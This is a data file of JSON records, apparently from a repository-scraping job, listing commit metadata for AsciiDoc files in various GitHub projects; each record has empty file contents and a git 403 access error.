{"commit":"e1b09ed6bb7ff1ac6ae86f3a377a2f2ff1ede3ad","subject":"Update 2016-08-02-ONE-post.adoc","message":"Update 2016-08-02-ONE-post.adoc","repos":"jamarortiz\/pragmaticalware,jamarortiz\/pragmaticalware,jamarortiz\/pragmaticalware,jamarortiz\/pragmaticalware","old_file":"_posts\/2016-08-02-ONE-post.adoc","new_file":"_posts\/2016-08-02-ONE-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jamarortiz\/pragmaticalware.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8a5297c6b660c318910da1f392e04b578f2d45e0","subject":"Some clarifications","message":"Some 
clarifications\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"995609a0935189bcf3c157fa5a9b3a9bf660b6db","subject":"initial cut of reworked GEP-8","message":"initial cut of reworked GEP-8\n","repos":"groovy\/groovy-website,groovy\/groovy-website","old_file":"site\/src\/site\/wiki\/GEP-8.adoc","new_file":"site\/src\/site\/wiki\/GEP-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/groovy\/groovy-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a2247d47b5689d19e66fae189a7ca08c093f9b08","subject":"Update 2016-11-14-redux-logger-index-has-no-default-export-redux-thunk-redux-promise-webpack-typescript.adoc","message":"Update 2016-11-14-redux-logger-index-has-no-default-export-redux-thunk-redux-promise-webpack-typescript.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-11-14-redux-logger-index-has-no-default-export-redux-thunk-redux-promise-webpack-typescript.adoc","new_file":"_posts\/2016-11-14-redux-logger-index-has-no-default-export-redux-thunk-redux-promise-webpack-typescript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e0a274b316fc98907386768c5f3de151522ea679","subject":"Add code of conduct","message":"Add code of conduct\n","repos":"ollie314\/spring-android,spring-projects\/spring-android,ollie314\/spring-android,spring-projects\/spring-android,royclarkson\/spring-android,royclarkson\/spring-android","old_file":"CODE_OF_CONDUCT.adoc","new_file":"CODE_OF_CONDUCT.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/royclarkson\/spring-android.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c88546f98643590182c7b302cc02f451c53dc6b6","subject":"Update 2017-XX-XX-Testing-puppet-agent-on-Ubuntu-on-Windows.adoc","message":"Update 2017-XX-XX-Testing-puppet-agent-on-Ubuntu-on-Windows.adoc","repos":"nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io,nnn-dev\/nnn-dev.github.io","old_file":"_posts\/2017-XX-XX-Testing-puppet-agent-on-Ubuntu-on-Windows.adoc","new_file":"_posts\/2017-XX-XX-Testing-puppet-agent-on-Ubuntu-on-Windows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nnn-dev\/nnn-dev.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"17c98199deeaad449a3bd589c463054b8f4e4b7c","subject":"Update 2017-03-03-C-S-S-triangle.adoc","message":"Update 2017-03-03-C-S-S-triangle.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-03-C-S-S-triangle.adoc","new_file":"_posts\/2017-03-03-C-S-S-triangle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"222a7a7ee41635c2f64f2a4a0cd21f018b420791","subject":"Renamed '_posts\/2019-01-31-Find-your-HOME.adoc' to '_posts\/2017-10-23-Find-your-HOME.adoc'","message":"Renamed '_posts\/2019-01-31-Find-your-HOME.adoc' to '_posts\/2017-10-23-Find-your-HOME.adoc'","repos":"sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io,sebasmonia\/sebasmonia.github.io","old_file":"_posts\/2017-10-23-Find-your-HOME.adoc","new_file":"_posts\/2017-10-23-Find-your-HOME.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sebasmonia\/sebasmonia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dee486d5eb8fccf602910c9868d4837fd11f3b6e","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","message":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"266ba544e8d03339412779985472aa4bf69d7b00","subject":"Added readme for temperature broadcast project","message":"Added readme for temperature broadcast project\n","repos":"NordicSemiconductor\/ble-sdk-arduino,NordicSemiconductor\/ble-sdk-arduino,Cheong2K\/ble-sdk-arduino,pi19404\/ble-sdk-arduino,pi19404\/ble-sdk-arduino,NordicSemiconductor\/ble-sdk-arduino,NordicSemiconductor\/ble-sdk-arduino,Cheong2K\/ble-sdk-arduino,Cheong2K\/ble-sdk-arduino,NordicSemiconductor\/ble-sdk-arduino,pi19404\/ble-sdk-arduino,Cheong2K\/ble-sdk-arduino,pi19404\/ble-sdk-arduino","old_file":"libraries\/BLE\/examples\/ble_temperature_broadcast\/README.adoc","new_file":"libraries\/BLE\/examples\/ble_temperature_broadcast\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pi19404\/ble-sdk-arduino.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b2cc57cd9a21936a597cfbb183d474f3cf0b2146","subject":"Update 2016-6-29-PHP-CSV.adoc","message":"Update 2016-6-29-PHP-CSV.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-29-PHP-CSV.adoc","new_file":"_posts\/2016-6-29-PHP-CSV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f5ce68e0fd07ad6d068e0c1129a23492647eb77","subject":"Update 2016-04-07-Analizando-cabeceras-E-mail.adoc","message":"Update 
2016-04-07-Analizando-cabeceras-E-mail.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Analizando-cabeceras-E-mail.adoc","new_file":"_posts\/2016-04-07-Analizando-cabeceras-E-mail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ea661e0910684caf8b6d63f6ebdda1062bdee98","subject":"Update 2016-04-07-Analizando-cabeceras-E-mail.adoc","message":"Update 2016-04-07-Analizando-cabeceras-E-mail.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-07-Analizando-cabeceras-E-mail.adoc","new_file":"_posts\/2016-04-07-Analizando-cabeceras-E-mail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ddcb928333b5610cb5803de8ab8b436e377f208","subject":"Update 2017-03-16-What-init-system-am-I-using.adoc","message":"Update 2017-03-16-What-init-system-am-I-using.adoc","repos":"jsiu22\/blog,jsiu22\/blog,jsiu22\/blog,jsiu22\/blog","old_file":"_posts\/2017-03-16-What-init-system-am-I-using.adoc","new_file":"_posts\/2017-03-16-What-init-system-am-I-using.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsiu22\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c38551c6419c33fddcda9220b4d15691a2f34a07","subject":"Update 2017-08-06-WWJQD-What-Would-j-Query-Do.adoc","message":"Update 2017-08-06-WWJQD-What-Would-j-Query-Do.adoc","repos":"ashelle\/ashelle.github.io,ashelle\/ashelle.github.io,ashelle\/ashelle.github.io,ashelle\/ashelle.github.io","old_file":"_posts\/2017-08-06-WWJQD-What-Would-j-Query-Do.adoc","new_file":"_posts\/2017-08-06-WWJQD-What-Would-j-Query-Do.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ashelle\/ashelle.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5c56e9f9d02c6be134ae8c7fb090e568ce909946","subject":"y2b create post The Most RIDICULOUS MacBook Pro","message":"y2b create post The Most RIDICULOUS MacBook Pro","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-01-05-TheMostRIDICULOUSMacBookPro.adoc","new_file":"_posts\/2018-01-05-TheMostRIDICULOUSMacBookPro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"83425aed0c8c8055491dd6b9d7837ad5c6a21ae3","subject":"initial commit","message":"initial 
commit\n","repos":"dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,wombat\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop,arun-gupta\/kubernetes-aws-workshop,dalbhanj\/kubernetes-aws-workshop","old_file":"quick-deploy\/readme.adoc","new_file":"quick-deploy\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dalbhanj\/kubernetes-aws-workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9e31472d0742bf6f67f60a9a3ea4cac473724802","subject":"Update 2016-6-29-PHP-CSV.adoc","message":"Update 2016-6-29-PHP-CSV.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-29-PHP-CSV.adoc","new_file":"_posts\/2016-6-29-PHP-CSV.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f2d32dae73741f953d3d7cf322b189ec614bc589","subject":"Update 2015-08-15-Een-test.adoc","message":"Update 2015-08-15-Een-test.adoc","repos":"PauloMoekotte\/PauloMoekotte.github.io,PauloMoekotte\/PauloMoekotte.github.io,PauloMoekotte\/PauloMoekotte.github.io","old_file":"_posts\/2015-08-15-Een-test.adoc","new_file":"_posts\/2015-08-15-Een-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PauloMoekotte\/PauloMoekotte.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dd3a332b9d66b926f1d0e85fe38e69c9853e0d5f","subject":"add adoc to version control","message":"add adoc to version control\n","repos":"naipmoro\/lofmm","old_file":"lof_in_mm.adoc","new_file":"lof_in_mm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/naipmoro\/lofmm.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14ef2bf0af5c2363c573366024642effcd1e8aad","subject":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","message":"Update 2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_file":"_posts\/2015-06-01-My-lodashunderscorejs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be5c3bd3b7e029904c1c7408ca0524259faf1295","subject":"Update 2016-10-06-Blockchain-Rebranding-Industries.adoc","message":"Update 2016-10-06-Blockchain-Rebranding-Industries.adoc","repos":"pramodjg\/articles,pramodjg\/articles,pramodjg\/articles,pramodjg\/articles","old_file":"_posts\/2016-10-06-Blockchain-Rebranding-Industries.adoc","new_file":"_posts\/2016-10-06-Blockchain-Rebranding-Industries.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pramodjg\/articles.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"27f438a22691377da3248667fd10531148fdf329","subject":"Update 2017-04-10-Biologistische-Evolutionsmarchen.adoc","message":"Update 2017-04-10-Biologistische-Evolutionsmarchen.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-04-10-Biologistische-Evolutionsmarchen.adoc","new_file":"_posts\/2017-04-10-Biologistische-Evolutionsmarchen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ababbb73602e9762bc7c3293849d3ed4030b2415","subject":"Update 2017-05-19-swift-chat.adoc","message":"Update 2017-05-19-swift-chat.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-19-swift-chat.adoc","new_file":"_posts\/2017-05-19-swift-chat.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f84e3a0317412fdcc80431a6a727d9e8f98b85e","subject":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","message":"Update 2015-05-30-My-Asyncjs-Cheatsheet.adoc","repos":"YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io,YannBertrand\/yannbertrand.github.io","old_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_file":"_posts\/2015-05-30-My-Asyncjs-Cheatsheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/YannBertrand\/yannbertrand.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"41d34cfbe5ab9e49ac9078babd98aad35bfa47d3","subject":"Update 2016-04-13-Administracion-Remota.adoc","message":"Update 2016-04-13-Administracion-Remota.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-13-Administracion-Remota.adoc","new_file":"_posts\/2016-04-13-Administracion-Remota.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"384e38ccfe216f17f773a79a5e35d5a5bedbc4b8","subject":"Update 2017-06-06-Make-Kali-Great-Again.adoc","message":"Update 2017-06-06-Make-Kali-Great-Again.adoc","repos":"icthieves\/icthieves.github.io,icthieves\/icthieves.github.io,icthieves\/icthieves.github.io,icthieves\/icthieves.github.io","old_file":"_posts\/2017-06-06-Make-Kali-Great-Again.adoc","new_file":"_posts\/2017-06-06-Make-Kali-Great-Again.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/icthieves\/icthieves.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f393a10881460d5026056bd0477ded47bb208e4","subject":"Update 2017-12-10-A-W-S-Cloud9-G-A-E-Go.adoc","message":"Update 
2017-12-10-A-W-S-Cloud9-G-A-E-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-10-A-W-S-Cloud9-G-A-E-Go.adoc","new_file":"_posts\/2017-12-10-A-W-S-Cloud9-G-A-E-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21bd7cfcf3c0a676062aaee88df85ac176844d90","subject":"Update 2015-06-09-Cousteaus-Journey.adoc","message":"Update 2015-06-09-Cousteaus-Journey.adoc","repos":"jsonify\/jsonify.github.io,jsonify\/jsonify.github.io,jsonify\/jsonify.github.io","old_file":"_posts\/2015-06-09-Cousteaus-Journey.adoc","new_file":"_posts\/2015-06-09-Cousteaus-Journey.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsonify\/jsonify.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed45138491b74a3c667fa5a28f2d966ac6c43c99","subject":"Update 2016-03-31-Descuidos-fatales.adoc","message":"Update 2016-03-31-Descuidos-fatales.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Descuidos-fatales.adoc","new_file":"_posts\/2016-03-31-Descuidos-fatales.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c3c82b9f5ce4b95a63974cb62d8023a1292b2994","subject":"Publish 2015-09-2-Daisies-arent-roses.adoc","message":"Publish 2015-09-2-Daisies-arent-roses.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"2015-09-2-Daisies-arent-roses.adoc","new_file":"2015-09-2-Daisies-arent-roses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7f5dd518060cdfcb385eb8acf2cb6a314ea42c7","subject":"Update 2015-06-11-Fireworks.adoc","message":"Update 2015-06-11-Fireworks.adoc","repos":"yysk\/yysk.github.io,yysk\/yysk.github.io,yysk\/yysk.github.io","old_file":"_posts\/2015-06-11-Fireworks.adoc","new_file":"_posts\/2015-06-11-Fireworks.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/yysk\/yysk.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb73686d0948e00af0df222b3a91fa0f857164f2","subject":"Add doc for tests-with-coverage quickstart","message":"Add doc for tests-with-coverage quickstart\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/tests-with-coverage-guide.adoc","new_file":"docs\/src\/main\/asciidoc\/tests-with-coverage-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9ef5b27284aea90effe89a0f2b67b6e3edc278e1","subject":"Additional 
resources and next steps ID guidelines","message":"Additional resources and next steps ID guidelines\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"contributing_to_docs\/doc_guidelines.adoc","new_file":"contributing_to_docs\/doc_guidelines.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d8fc54ac5e5109a6675fb8d2f77c6b85654a40d4","subject":"job #11571 add analysis note draft","message":"job #11571 add analysis note draft\n","repos":"cortlandstarrett\/mc,lwriemen\/mc,xtuml\/mc,lwriemen\/mc,rmulvey\/mc,lwriemen\/mc,leviathan747\/mc,xtuml\/mc,keithbrown\/mc,leviathan747\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,keithbrown\/mc,cortlandstarrett\/mc,leviathan747\/mc,xtuml\/mc,leviathan747\/mc,cortlandstarrett\/mc,leviathan747\/mc,rmulvey\/mc,cortlandstarrett\/mc,xtuml\/mc,xtuml\/mc,rmulvey\/mc,lwriemen\/mc,keithbrown\/mc,keithbrown\/mc,leviathan747\/mc,keithbrown\/mc,lwriemen\/mc,rmulvey\/mc,rmulvey\/mc,xtuml\/mc,lwriemen\/mc,rmulvey\/mc,keithbrown\/mc","old_file":"doc\/notes\/11571_mcmc_ciera_ant.adoc","new_file":"doc\/notes\/11571_mcmc_ciera_ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8b33dfc00cb066f1de947dcbcbb8ea52bf5f81fd","subject":"Document de pr\u00e9conception ; WIP","message":"Document de pr\u00e9conception ; WIP\n","repos":"autosvg\/autosvg,autosvg\/autosvg,autosvg\/autosvg","old_file":"docs\/preconception.adoc","new_file":"docs\/preconception.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/autosvg\/autosvg.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"c20db653ab576c42e3e48b3d1c61d46196b199f0","subject":"Update 2016-07-29-Migration-t.adoc","message":"Update 2016-07-29-Migration-t.adoc","repos":"erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016,erramuzpe\/gsoc2016","old_file":"_posts\/2016-07-29-Migration-t.adoc","new_file":"_posts\/2016-07-29-Migration-t.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/erramuzpe\/gsoc2016.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4fa3ecf2e44bda3a62afea959cd3d4abb6cf231d","subject":"Update 2016-09-02-Swift-Tuple.adoc","message":"Update 2016-09-02-Swift-Tuple.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_file":"_posts\/2016-09-02-Swift-Tuple.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"927c8052174464e9c032fa490eabd28af8eefb08","subject":"Update 20161110-1328-have-fun.adoc","message":"Update 
20161110-1328-have-fun.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"_posts\/20161110-1328-have-fun.adoc","new_file":"_posts\/20161110-1328-have-fun.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2644d4f1f7e9a128d9f93ed7ed4c63bccf4ce3ef","subject":"Update 2015-06-24-Online-anomaly-detection-in-video.adoc","message":"Update 2015-06-24-Online-anomaly-detection-in-video.adoc","repos":"jankolorenc\/jankolorenc.github.io,jankolorenc\/jankolorenc.github.io,jankolorenc\/jankolorenc.github.io","old_file":"_posts\/2015-06-24-Online-anomaly-detection-in-video.adoc","new_file":"_posts\/2015-06-24-Online-anomaly-detection-in-video.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jankolorenc\/jankolorenc.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6650cdfea9b4d339fa5d0ba849f22eb491a860be","subject":"Update 2015-05-28-This-is-a-test.adoc","message":"Update 2015-05-28-This-is-a-test.adoc","repos":"2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io,2mosquitoes\/2mosquitoes.github.io","old_file":"_posts\/2015-05-28-This-is-a-test.adoc","new_file":"_posts\/2015-05-28-This-is-a-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2mosquitoes\/2mosquitoes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1efe5cf1fcc75671d9ce7e2819c193ff3076dd48","subject":"Update 2016-07-16-Title.adoc","message":"Update 2016-07-16-Title.adoc","repos":"rubyinhell\/hubpress.io,rubyinhell\/hubpress.io,rubyinhell\/hubpress.io,rubyinhell\/hubpress.io","old_file":"_posts\/2016-07-16-Title.adoc","new_file":"_posts\/2016-07-16-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rubyinhell\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2932b8cd7b1a3e0a35207ca42415cc8519ed9a58","subject":"Update 2017-04-14-Azure-3.adoc","message":"Update 2017-04-14-Azure-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-14-Azure-3.adoc","new_file":"_posts\/2017-04-14-Azure-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84108e4ea66ac9888966b7c64e9f5d498a57d56f","subject":"Update 2017-10-09-Azure-7.adoc","message":"Update 2017-10-09-Azure-7.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-10-09-Azure-7.adoc","new_file":"_posts\/2017-10-09-Azure-7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
